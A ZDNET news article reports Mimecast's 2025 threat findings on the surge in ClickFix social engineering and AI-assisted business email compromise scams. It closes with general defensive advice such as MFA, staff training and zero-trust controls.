Follow ZDNET: Add us as a favorite source On Google.
ZDNET Highlights
- Clickfix attacks increased by 500% in early 2025.
- Cyber criminals now use AI in BEC scams.
- AI is making phishing harder to detect.
Clickfix With social engineering and AI abuse becoming even more popular, cybercriminals are changing their techniques to focus on the human element.
Also: This new cyber attack makes you want to hack yourself. Here’s how to recognize it
On Wednesday, Mimecast published its latest global threat intelligence reportWhich monitored threat activity from January to September 2025 and analyzed trillions of signals.
The report on modern cyber threats includes the usual suspects: phishing, ransomware, exploitation of popular business tools like DocuSend, and industry-specific threats. However, two trends highlight a shift in tactics targeting the human element in scams, which are operating with greater efficiency on victims.
clickfix rates increased
Many cybersecurity companies and tech giants, including Microsoft, are alerting users to clickfix – a social engineering technique that is being adopted by threat actors around the world.
Clickfix is a method of bypassing traditional anti-phishing techniques by luring victims into providing initial access to a network or system, eliminating the need for the malware to do so. Fake error messages, seemingly minor technical problem alerts, and more suspicious messages – such as apparently free ways to install licensed software – are displayed to the victim with a simple step-by-step guide.
Unfortunately, these “guides” direct users to launch PowerShell and input commands that trigger the download of malicious payloads, including information stealers and ransomware.
Mimecast says clickfix rates increased 500% in the first half of 2025, accounting for about 8% of all attacks.
Also: If a TikTok ‘tech tip’ asks you to paste a code, it’s a scam. What exactly is going on here
Mimecast threat research engineer Hiwot Mendahun told ZDNET that threat actors are adopting ClickFix as a means of early access, and the company believes “it will continue to be used as a means to download infostealers, ransomware, remote access trojans (RATs), and custom malware.”
“The use of RMM (remote monitoring and management) tools to enable early access in the same way is also a vector in which we are seeing growth, with campaigns really focusing on the social engineering aspect,” Mendahun said.
New wave of AI-powered BEC scams
As with any new technological innovation there is abuse. For example, artificial intelligence (AI) is being increasingly adopted in phishing and business email compromise (BEC) scams.
Although impersonating employees or high-profile executives in phishing and BEC scams is nothing new, AI is being employed in ways that make email chains seem more credible – and not just to create the initial phishing email.
Mimecast says AI is being used to generate complete conversation chains that impersonate multiple people, including vendors, executives, and third parties.
Too: Scammers have infiltrated Google’s AI responses – how to spot them
For example, during the reconnaissance phase, an attacker may find financial information and reports, HR data, and payroll information that can be used in AI-generated email threads. AI is then used to craft interactions between vendors, employees, and high-profile personalities, usually with a sense of urgency – such as a request to pay an invoice immediately.
Recent BEC attack vectors focus on fraudulent invoice payments, changes to bank account details, payroll updates, and wire transfers. The team believes that as the misuse of AI increases with the use of deepfake voice and video content, these scams will become even more difficult to detect. And as AI tools become readily available, more cybercriminals will be able to enter this field.
Too: AI uncovers more advanced scams. Here’s what to look for (and how to stay safe)
“The use of AI in these campaigns in particular gives threat actors the ability to mass produce more targeted threads using automation and potentially alter content to help bypass content-based detection,” Mendahun commented. “In addition to automated emails, we see the use of deep voice and video in BEC campaigns increasing the success rate of larger fraudulent transactions.”
Who is at risk?
According to Mimecast, education, IT, telecommunications, legal sectors, and real estate companies are most at risk of impersonation and social engineering-based attacks, “as these sectors often have direct access to high-value targets, handle sensitive financial transactions, and manage confidential customer information.”
Too: Perplexity’s Comet AI browser could expose your data to attackers – here’s why
With respect to real estate, the company says the rate of social engineering attacks continues to increase, which may indicate that some criminal groups are moving toward this sector and away from more traditional targets.
Groups including Scattered Spiders and TA2541 have been linked to attacks against these industries.
recommendations
Phishing and social engineering attacks are nothing new, but the methods to conduct them are constantly evolving – and clickfix techniques have added another dangerous element to the mix. Consider the following to reduce the risk of a successful intrusion:
Too: Phishing training doesn’t stop your employees from clicking scam links – here’s how
- increased control: By implementing additional authentication and authorization checks – preferably across multiple platforms or departments – unauthorized, fraudulent invoices and BEC-related payment requests are more likely to be caught before it is too late.
- Multi-Factor Authentication (MFA): Even if a phishing campaign is successful, using two-factor authentication (2FA) or MFA can reduce the risk of account hijacking.
- Training and Awareness: Employees, especially those with privileged status and access to sensitive resources or payment systems, should have regular training to detect phishing, BEC, and social engineering attempts. However, this does not mean a one-time annual training.
- zero-trust architecture: When possible, organizations should consider implementing system architecture and controls based on zero-trust principles, so that employees do not have access to any resources that are not strictly necessary for their job roles, thereby reducing the attack surface.
- clickfix: Regarding ClickFix social engineering tactics, traditional anti-phishing methods will not work, as they are designed to lure victims into performing the malicious activity themselves. Raising awareness about ClickFix and emphasizing that submitting commands to a machine when you are not sure what they will do is dangerous and can lead to a complete hijacking of the system.
Want more stories about AI? check out AI LeaderboardOur weekly newspaper.
